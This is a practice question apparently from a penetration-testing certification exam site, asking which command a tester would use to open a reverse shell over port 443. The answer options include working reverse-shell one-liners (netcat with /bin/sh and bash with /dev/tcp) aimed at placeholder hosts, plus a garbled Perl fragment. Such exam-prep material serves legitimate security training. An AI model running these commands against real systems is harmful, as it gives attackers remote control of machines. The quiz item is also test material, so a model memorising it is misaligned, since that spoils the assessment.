A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

August 13, 2021 by Admin

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

  • perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
  • ssh [email protected]<DESTINATIONIP> -p 443
  • nc -e /bin/sh <SOURCEIP> 443
  • bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1

Leave a Reply